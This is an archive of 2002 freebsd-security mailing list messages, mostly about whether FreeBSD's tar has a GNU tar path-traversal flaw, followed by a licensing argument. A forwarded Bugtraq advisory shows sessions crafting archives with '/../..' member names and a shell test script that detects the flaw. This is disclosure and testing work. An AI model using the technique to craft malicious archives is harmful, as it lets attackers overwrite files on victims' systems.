From owner-freebsd-security Mon Sep 30 7:30:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CC04C37B401 for ; Mon, 30 Sep 2002 07:30:45 -0700 (PDT) Received: from insomnia.spc.org (insomnia.spc.org [195.224.94.183]) by mx1.FreeBSD.org (Postfix) with SMTP id AEF9143E3B for ; Mon, 30 Sep 2002 07:30:44 -0700 (PDT) (envelope-from bms@insomnia.spc.org) Received: (qmail 12598 invoked by uid 1031); 30 Sep 2002 14:26:35 -0000 Date: Mon, 30 Sep 2002 15:26:34 +0100 From: Bruce M Simpson To: Garrett Wollman Cc: Ivailo Tanusheff , FreeBSD Security Subject: Re: PKI Message-ID: <20020930142634.GR26352@spc.org> Mail-Followup-To: Bruce M Simpson , Garrett Wollman , Ivailo Tanusheff , FreeBSD Security References: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg> <20020927131234.GE26352@spc.org> <200209271728.g8RHSGYT011814@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200209271728.g8RHSGYT011814@khavrinen.lcs.mit.edu> User-Agent: Mutt/1.3.28i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Sep 27, 2002 at 01:28:16PM -0400, Garrett Wollman wrote: > > www.openca.org > ...or you can just write your own; I did one in about three weeks, > most of which was spent figuring out why various pieces of software > didn't do the obvious and standard thing. Planning on releasing it? :-) OpenCA seemed like a nice idea, but fixing people's broken makefiles tends to erode one's enthusiasm! BMS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 30 8:21:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B9EF337B401 for ; Mon, 30 Sep 2002 08:21:25 -0700 (PDT) Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3229043E3B for ; Mon, 30 Sep 2002 08:21:22 -0700 (PDT) (envelope-from never@mile.nevermind.kiev.ua) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.6/8.12.6) with ESMTP id g8UFK3mO045005; Mon, 30 Sep 2002 18:20:04 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.6/8.12.6/Submit) id g8UFJrhN044987; Mon, 30 Sep 2002 18:19:53 +0300 (EEST) Date: Mon, 30 Sep 2002 18:19:53 +0300 From: Alexandr Kovalenko To: Duncan Campbell Cc: freebsd-security@FreeBSD.ORG, mailman@crypton.pl Subject: Re: kern.ps_showallprocs and procfs Message-ID: <20020930151953.GA44971@nevermind.kiev.ua> References: <200209271254.GAA18796@tagish.taiga.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: <200209271254.GAA18796@tagish.taiga.ca> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, Duncan Campbell! On Fri, Sep 27, 2002 at 06:54:08AM -0600, you wrote: > I tend to regard procfs as something of a debugging tool. If > you limit it as is probably necessary to do what you suggest, > its value as a tool becomes degraded. No, I don't think that procfs is debugging tool. It is used by OpenOffice, for example. -- NEVE-RIPE Ukrainian FreeBSD User Group http://uafug.org.ua/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 0: 4:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8F3DA37B401; Tue, 1 Oct 2002 00:04:14 -0700 (PDT) Received: from smtp01.wxs.nl (smtp01.wxs.nl [195.121.6.61]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3B84C43E65; Tue, 1 Oct 2002 00:04:13 -0700 (PDT) (envelope-from Peter.Blok@inter.NL.net) Received: from bsdpc ([80.60.248.65]) by smtp01.wxs.nl (Netscape Messaging Server 4.15) with ESMTP id H3AJMZ00.AD8; Tue, 1 Oct 2002 09:04:12 +0200 Content-Type: text/plain; charset="iso-8859-1" From: "Peter J. Blok" To: "Crist J. Clark" , "Crist J. Clark" Subject: Re: cisco/altiga client Date: Tue, 1 Oct 2002 09:01:17 +0200 User-Agent: KMail/1.4.3 Cc: freebsd-security@FreeBSD.ORG References: <200209251357.35279.Peter.Blok@inter.NL.net> <20021001060823.GD79303@blossom.cjclark.org> In-Reply-To: <20021001060823.GD79303@blossom.cjclark.org> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200210010901.17423.Peter.Blok@inter.NL.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yeah I figured it was something like that. I have been watching the setup of a client with a concentrator and I see the same. I was hoping the client was able to run in a sort of compatability mode, but haven't found it so far. My last attempt will be to try it with the version 3.6 client. Peter On Tuesday 01 October 2002 08:08, Crist J. Clark wrote: > On Wed, Sep 25, 2002 at 01:57:35PM +0200, Peter J. Blok wrote: > > Hi, > > > > I have Cisco VPN 3000 (Altiga) software client on my laptop. With this > > client I establish a connection with a 3000 series concentrator. > > > > I would like to use the same software client to establish a transport > > connection with a FreeBSD host running racoon. > > > > Can somebody help me with this? Could this work? > > I've looked at it briefly. The system does some proprietary steps in > authentication. You can't just log in like a "client" user. You could > definately set up a site-to-site VPN. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 9:47:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E85DD37B406 for ; Tue, 1 Oct 2002 09:47:45 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 49CF843E4A for ; Tue, 1 Oct 2002 09:47:45 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA18412 for ; Tue, 1 Oct 2002 10:47:31 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001104558.00d3f900@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 10:47:23 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: Is FreeBSD's tar susceptible to this? Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org From Bugtraq: Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 17532 invoked from network); 26 Sep 2002 23:50:32 -0000 X-Authentication-Warning: datacontact.hu: boldi owned process doing -bs Date: Fri, 27 Sep 2002 02:11:07 +0200 (CEST) From: Bencsath Boldizsar X-X-Sender: boldi@datacontact.hu To: bugtraq@securityfocus.com Subject: Allot Netenforcer problems, GNU TAR flaw Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-2 Content-Transfer-Encoding: 8BIT X-Virus-Scanned: by amavis-dc X-UIDL: 04e05b0b2a906d53883806bcadcee73b Security Advisory, case study - Netenforcer 1.Multiple security flaws lead to Netenforcer privilege escalation 2.Vulnerable tar packages [Netenforcer material snipped] 2. Description of the "tar" problem Creating a tar file with -P option one can put any file names in the tar file. While unpacking such tar files, tar is designed to remove leading slash. Other security feature of the tar package is to deny deployment of any files whose name contains "dotdot" (".."). A bug in the tar package leads to a security flaw: "../something" is denied by tar "/something" leading slash is removed "/../something" leading slash removed but ".." is NOT denied "./../something" ".." is NOT denied. Although we found this bug by studying tar, we found that this bug has been found by others, we should give them credit: check out: From: Mark J Cox (mjc@redhat.com) Subject: [SECURITY] bug in contains_dot_dot routine Newsgroups: gnu.utils.bug Date: 2002-05-27 03:45:07 PST by Mark J Cox / Red Hat / OpenSSL / Apache Software Foundation and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1267 While this bug can affect systems with antivirus products (amavis is not affected) or any systems like the before mentioned, we think that a "more rapid" answer to such "small" security problems is needed. As You have seen: Small bugs can lead to a whole system crack. Tar - Affected software versions: GNU tar is affected, but e.g. SunOS tar does not do any sanity check. Debian: tar 1.13.17-2 NOT vulnerable (-) tar 1.13.25-3 (unstable) IS vulnerable (+) tar 1.13.25-2 (unstable) IS vulnerable (+) Suse 7.3 tar 1.13.18 NOT vulnerable Suse 6.4 tar 1.13.17 NOT vulnerable Netenforcer: tar (in software 4.2) IS vulnerable others: unknown Sample session: echo "foo bar" >/tmp/zz/b echo "foo bar" >/tmp/zz/b2 echo "foo bar" >/tmp/zz/b3 echo "foo bar" >a boldi@boldi:/tmp/b$ tar cfv b.tar a ../../../../../../../tmp/zz/b -P a ../../../../../../../tmp/zz/b boldi@boldi:/tmp/b$ rm /tmp/zz/b boldi@boldi:/tmp/b$ tar xfv b.tar a ../../../../../../../tmp/zz/b tar: ../../../../../../../tmp/zz/b: Member name contains `..' tar: Error exit delayed from previous errors boldi@boldi:/tmp/b$ls -la /tmp/zz/b ls: /tmp/zz/b: No such file or directory #note - this is O.K. , if found ".." in the name #session 2: boldi@boldi:/tmp/b$ tar cfv b2.tar a /tmp/zz/b2 -P a /tmp/zz/b2 boldi@boldi:/tmp/b$ rm /tmp/zz/b2 boldi@boldi:/tmp/b$ tar xfv b2.tar a /tmp/zz/b2 tar: Removing leading `/' from member names boldi@boldi:/tmp/b$ ls -la /tmp/zz/b2 ls: /tmp/zz/b2: No such file or directory boldi@boldi:/tmp/b$ ls -la /tmp/b/tmp/zz/b2 -rw-rw-r-- 1 boldi boldi 10 sze 8 12:47 /tmp/b/tmp/zz/b2 boldi@boldi:/tmp/b$ tar cfv b3.tar a /////tmp/zz/b3 -P a /////tmp/zz/b3 boldi@boldi:/tmp/b$ rm /tmp/zz/b3 boldi@boldi:/tmp/b$ tar xfv b3.tar a /////tmp/zz/b3 tar: Removing leading `/////' from member names boldi@boldi:/tmp/b$ ls -la /tmp/zz/b3 ls: /tmp/zz/b3: No such file or directory #session 2 is o.k. #session 3: boldi@boldi:/tmp/b$ echo "try this one. boldi." >/tmp/zz/final boldi@boldi:/tmp/b$ tar cfv bolditry.tar a /../../../../../../tmp/zz/final -Pa /../../../../../../tmp/zz/final boldi@boldi:/tmp/b$ rm /tmp/zz/final boldi@boldi:/tmp/b$ ls -la /tmp/zz/final ls: /tmp/zz/final: No such file or directory boldi@boldi:/tmp/b$ tar xfv bolditry.tar a /../../../../../../tmp/zz/final tar: Removing leading `/' from member names boldi@boldi:/tmp/b$ ls -la /tmp/zz/final -rw-rw-r-- 1 boldi boldi 21 sze 8 13:03 /tmp/zz/final #session 3: vulnerable. ####Attachment: small script testing Your tar too####### TAR=/usr/bin/tar DIR=/tmp #tar problem tester by boldi cd $DIR mkdir foo cd foo echo "boldi" >bar cd $DIR mkdir tartest cd tartest $TAR cfv boldi.tar /../../../../../../../$DIR/foo/bar -P rm $DIR/foo/bar if [ -f $DIR/foo/bar ] ; then echo "something went wrong with the test"; else $TAR xfv boldi.tar 2>&1 if [ -f $DIR/foo/bar ] ; then echo "Your tar is vulnerable"; else echo "Your tar is NOT vulnerable or error occoured"; fi; fi cd $DIR rm foo/bar rmdir foo rm tartest/boldi.tar rmdir tartest ##############end of attachment########################## Boldizsar Bencsath Dept. of Telecommunications Budapest University of Technology and Economics H-1111 Budapest, Magyar tudósok körútja 2. I ép. E.429. email: bencsath.boldizsar@mail2002.ebizlab.hit.bme.hu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 10:27:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A8BCE37B401 for ; Tue, 1 Oct 2002 10:27:27 -0700 (PDT) Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by mx1.FreeBSD.org (Postfix) with ESMTP id 448CE43E77 for ; Tue, 1 Oct 2002 10:27:27 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc51.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20021001172726.DTZR17535.rwcrmhc51.attbi.com@blossom.cjclark.org>; Tue, 1 Oct 2002 17:27:26 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g91HRPWn081948; Tue, 1 Oct 2002 10:27:25 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g91HRO98081947; Tue, 1 Oct 2002 10:27:24 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Tue, 1 Oct 2002 10:27:24 -0700 From: "Crist J. Clark" To: "Peter J. Blok" Cc: freebsd-security@FreeBSD.ORG Subject: Re: cisco/altiga client Message-ID: <20021001172724.GA81932@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <200209251357.35279.Peter.Blok@inter.NL.net> <20021001060823.GD79303@blossom.cjclark.org> <200210010901.17423.Peter.Blok@inter.NL.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200210010901.17423.Peter.Blok@inter.NL.net> User-Agent: Mutt/1.4i X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Oct 01, 2002 at 09:01:17AM +0200, Peter J. Blok wrote: > Yeah I figured it was something like that. I have been watching the setup of a > client with a concentrator and I see the same. Duh, I completely misread your mail. You want to use the Cisco _client_ software to connect to racoon. I really doubt this will work. Are you running Win2k or another Windows version with native IPsec? You'd be much better off trying that. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 10:35:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0124637B401 for ; Tue, 1 Oct 2002 10:35:31 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id DEFE643E77 for ; Tue, 1 Oct 2002 10:35:29 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id LAA19133; Tue, 1 Oct 2002 11:35:07 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001113225.034331b0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 11:35:03 -0600 To: "Aaron Namba" , From: Brett Glass Subject: RE: Is FreeBSD's tar susceptible to this? In-Reply-To: References: <4.3.2.7.2.20021001104558.00d3f900@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:15 AM 10/1/2002, Aaron Namba wrote: >It would appear so. > >59 > sh tartest >/../../../../../../..//tmp/foo/bar >/../../../../../../..//tmp/foo/bar >/usr/bin/tar: Removing leading `/' from member names >Your tar is vulnerable Unfortunately, GNU tar has become so pervasive that even OpenBSD (which avoids GNU software) uses it. Gotta break this dependency upon GPLed code. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 10:46:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E2DB237B401 for ; Tue, 1 Oct 2002 10:46:27 -0700 (PDT) Received: from cithaeron.argolis.org (pool-151-200-243-89.res.east.verizon.net [151.200.243.89]) by mx1.FreeBSD.org (Postfix) with ESMTP id D899443E42 for ; Tue, 1 Oct 2002 10:46:26 -0700 (PDT) (envelope-from piechota@argolis.org) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.6/8.12.5) with ESMTP id g91HkPEl016134; Tue, 1 Oct 2002 13:46:25 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.6/8.12.6/Submit) with ESMTP id g91HkPAq016131; Tue, 1 Oct 2002 13:46:25 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Tue, 1 Oct 2002 13:46:24 -0400 (EDT) From: Matt Piechota To: Brett Glass Cc: Aaron Namba , Subject: RE: Is FreeBSD's tar susceptible to this? In-Reply-To: <4.3.2.7.2.20021001113225.034331b0@localhost> Message-ID: <20021001134440.V15368-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brett Glass wrote: > Unfortunately, GNU tar has become so pervasive > that even OpenBSD (which avoids GNU software) uses > it. Gotta break this dependency upon GPLed code. Fearing the off-topic avalanche that's going to come of this... Why the GPL? It would have been just as likely to happen in BSD tar, except you'd have lots of people with their own patches that no one else could see. While the GPL isn't -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 11:24: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0E94137B401 for ; Tue, 1 Oct 2002 11:24:07 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id EC1C643E6A for ; Tue, 1 Oct 2002 11:24:04 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA19802; Tue, 1 Oct 2002 12:23:42 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001122135.0344e410@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 12:23:30 -0600 To: Matt Piechota From: Brett Glass Subject: RE: Is FreeBSD's tar susceptible to this? Cc: Aaron Namba , In-Reply-To: <20021001134440.V15368-100000@cithaeron.argolis.org> References: <4.3.2.7.2.20021001113225.034331b0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:46 AM 10/1/2002, Matt Piechota wrote: >Fearing the off-topic avalanche that's going to come of this... > >Why the GPL? It would have been just as likely to happen in BSD tar, It would be less likely, because the BSDs have more peer review and more careful auditing. >except you'd have lots of people with their own patches that no one else >could see. Define "lots of people." When either FreeBSD, NetBSD, OpenBSD, or Darwin is patched, the others will follow. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 11:52:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4A49637B404 for ; Tue, 1 Oct 2002 11:52:32 -0700 (PDT) Received: from veldy.net (veldy-host33.dsl.visi.com [209.98.200.33]) by mx1.FreeBSD.org (Postfix) with ESMTP id CC0C043E3B for ; Tue, 1 Oct 2002 11:52:31 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from VELDYLT (localhost [127.0.0.1]) by veldy.net (Postfix) with SMTP id BC85BA7; Tue, 1 Oct 2002 13:52:29 -0500 (CDT) Message-ID: <031201c2697b$b1de6070$8204dca7@northamerica.corp.microsoft.com> From: "Thomas T. Veldhouse" To: "Matt Piechota" , "Brett Glass" Cc: "Aaron Namba" , References: <4.3.2.7.2.20021001113225.034331b0@localhost> <4.3.2.7.2.20021001122135.0344e410@localhost> Subject: [OT] Re: Is FreeBSD's tar susceptible to this? Date: Tue, 1 Oct 2002 13:52:28 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org That has absolutely nothing to do with the license of any software product. That was very much picking on GPL for more selfish reasons than this tar security notice. ;) Tom Veldhouse ----- Original Message ----- From: "Brett Glass" To: "Matt Piechota" Cc: "Aaron Namba" ; Sent: Tuesday, October 01, 2002 1:23 PM Subject: RE: Is FreeBSD's tar susceptible to this? > At 11:46 AM 10/1/2002, Matt Piechota wrote: > > >Fearing the off-topic avalanche that's going to come of this... > > > >Why the GPL? It would have been just as likely to happen in BSD tar, > > It would be less likely, because the BSDs have more peer review and > more careful auditing. > > >except you'd have lots of people with their own patches that no one else > >could see. > > Define "lots of people." When either FreeBSD, NetBSD, OpenBSD, or Darwin > is patched, the others will follow. > > --Brett > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 12:22:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 57DEE37B401 for ; Tue, 1 Oct 2002 12:22:12 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id DD7C643E4A for ; Tue, 1 Oct 2002 12:22:11 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from earthlink.net (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout03.icomcast.net (iPlanet Messaging Server 5.1 HotFix 1.4 (built Aug 5 2002)) with ESMTP id <0H3B002K6HSYSX@mtaout03.icomcast.net> for security@FreeBSD.ORG; Tue, 01 Oct 2002 15:22:11 -0400 (EDT) Date: Tue, 01 Oct 2002 15:22:10 -0400 From: Larry Sica Subject: Re: Is FreeBSD's tar susceptible to this? In-reply-to: <4.3.2.7.2.20021001122135.0344e410@localhost> To: Brett Glass Cc: Matt Piechota , Aaron Namba , security@FreeBSD.ORG Message-id: <150AE1C1-D573-11D6-AD20-000393A335A2@earthlink.net> MIME-version: 1.0 X-Mailer: Apple Mail (2.546) Content-type: text/plain; charset=US-ASCII; format=flowed Content-transfer-encoding: 7BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday, October 1, 2002, at 02:23 PM, Brett Glass wrote: > At 11:46 AM 10/1/2002, Matt Piechota wrote: > >> Fearing the off-topic avalanche that's going to come of this... >> >> Why the GPL? It would have been just as likely to happen in BSD tar, > > It would be less likely, because the BSDs have more peer review and > more careful auditing. > This is not because of the BSDL or GPL though. It is because of the project's makeup. Politics aside, a license has nothing to do with the quality of the work, or lack thereof. And many *BSD and BSDL products have had security problems. Now sure, the zlib problem was avoided. But FreeBSD has had it's own recent spate of problems. I am not sure this discussion is even appropriate in this forum. If we are vulnerable it needs to be fixed, period. Let's not use a security problem for political maneuvering. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 12:35:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CDBFE37B401 for ; Tue, 1 Oct 2002 12:35:54 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0D84F43E6A for ; Tue, 1 Oct 2002 12:35:54 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id NAA20783; Tue, 1 Oct 2002 13:35:30 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001133156.03609ec0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 13:35:27 -0600 To: Matthew Dillon From: Brett Glass Subject: Re: RE: Is FreeBSD's tar susceptible to this? Cc: Matt Piechota , Aaron Namba , In-Reply-To: <200210011928.g91JSOdI045047@apollo.backplane.com> References: <4.3.2.7.2.20021001113225.034331b0@localhost> <4.3.2.7.2.20021001122135.0344e410@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 01:28 PM 10/1/2002, Matthew Dillon wrote: > In our case, we have a simple recourse for 'tar' if the the gnu/tar > people are unable to stabilize their final product. We find a fairly > stable version and we fork it in our tree. I agree. And while folks are correct that licensing is not the only issue here, why not take the opportunity to adopt something BSD-licensed instead? At the same time, it would be possible to integrate bzip instead of invoking it as a separate process. This would make it more efficient when we go to bzip for ports and packages. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 12:56:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C040237B401 for ; Tue, 1 Oct 2002 12:56:34 -0700 (PDT) Received: from cithaeron.argolis.org (pool-151-200-243-89.res.east.verizon.net [151.200.243.89]) by mx1.FreeBSD.org (Postfix) with ESMTP id C18E643E6A for ; Tue, 1 Oct 2002 12:56:30 -0700 (PDT) (envelope-from piechota@argolis.org) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.6/8.12.5) with ESMTP id g91JhOEl017667; Tue, 1 Oct 2002 15:43:24 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.6/8.12.6/Submit) with ESMTP id g91JhNJn017664; Tue, 1 Oct 2002 15:43:23 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Tue, 1 Oct 2002 15:43:23 -0400 (EDT) From: Matt Piechota To: Cy Schubert - CITS Open Systems Group Cc: Brett Glass , Aaron Namba , Subject: Re: Is FreeBSD's tar susceptible to this? In-Reply-To: <200210011803.g91I3glk004506@cwsys.cwsent.com> Message-ID: <20021001154227.E15368-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Cy Schubert - CITS Open Systems Group wrote: > > Why the GPL? It would have been just as likely to happen in BSD tar, > > except you'd have lots 